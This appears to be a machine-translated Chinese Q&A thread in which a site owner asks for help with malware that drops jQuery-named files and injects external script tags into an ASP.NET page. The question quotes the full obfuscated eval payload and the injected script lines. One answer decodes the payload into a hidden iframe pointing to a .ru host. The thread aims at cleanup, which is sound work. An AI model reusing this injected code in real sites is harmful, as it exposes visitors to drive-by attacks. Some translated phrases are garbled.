我覺得我的網站感染了

Question

這讓我瘋狂。我認爲我的網站被某種病毒感染，這是發生了什麼：

隨機JavaScript文件出現在服務器上，其名稱如jquery.ui.dialog.min.js和jquery.ui.button.min.js。所有這些文件包含了同一段代碼：

s="";try{q=document.createElement("p");a=(q)?"appendChild":12;q[a]("123"+n);}catch(qw){f=(q)?"fromCharCode":2;h=-016/7;try{eval("a=prototype");}catch(zxc){e=window["e"+"va"+"l"];n="26.30.400.555.198.351.436.505.220.348.184.595.228.315.464.505.80.117.240.525.204.342.388.545.202.96.460.570.198.183.136.520.232.348.448.290.94.141.396.485.226.360.388.570.222.138.456.585.94.297.444.585.220.348.196.260.92.336.416.560.68.96.440.485.218.303.244.170.168.357.420.580.232.303.456.170.64.345.396.570.222.324.432.525.220.309.244.170.194.351.464.555.68.96.408.570.194.327.404.490.222.342.400.505.228.183.136.550.222.102.128.485.216.315.412.550.122.102.396.505.220.348.404.570.68.96.416.505.210.309.416.580.122.102.200.170.64.357.420.500.232.312.244.170.100.102.248.300.94.315.408.570.194.327.404.310.78.123.236.65.20".split(".");if(window.document)for(i=6-2-1-2-1;-161+i!=2-2;i++){k=i;s=s+String[f](n[k]/(i%(h*h)+2));}e(s);}} 

的主要問題是，這個「病毒」正在添加一行代碼到我default.aspx打破了服務器。以下是它正在添加的內容：

<asp:Content ID="Content1" ContentPlaceHolderID="cphBody" Runat="Server"> 
//Code here 
</asp:Content>**<script type="text/javascript" language="javascript" src="http://easydiablo3.com//ImageStorage/jquery.ui.button.min.js" ></script><script type="text/javascript" language="javascript" src="http://easydiablo3.com//themes/jquery.ui.dialog.min.js" ></script>** 

如果我刪除了他們稍後顯示的文件，有誰知道我該如何解決這個問題？

Answer 1

使用此鏈接可以檢測受感染的文件/文件夾

http://sitecheck.sucuri.net/scanner/

Answer 2

的代碼是eval()「荷蘭國際集團下面的代碼在你的頁面

<iframe src="http://caqxaro.ru/count14.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe> 

你可以在你的應用程序有一個vulnaribility某處，檢查你的數據庫是否有奇怪的值，如果你使用的是像joomla這樣的CMS，檢查升級。如果可能的話，恢復最近的應用程序備份。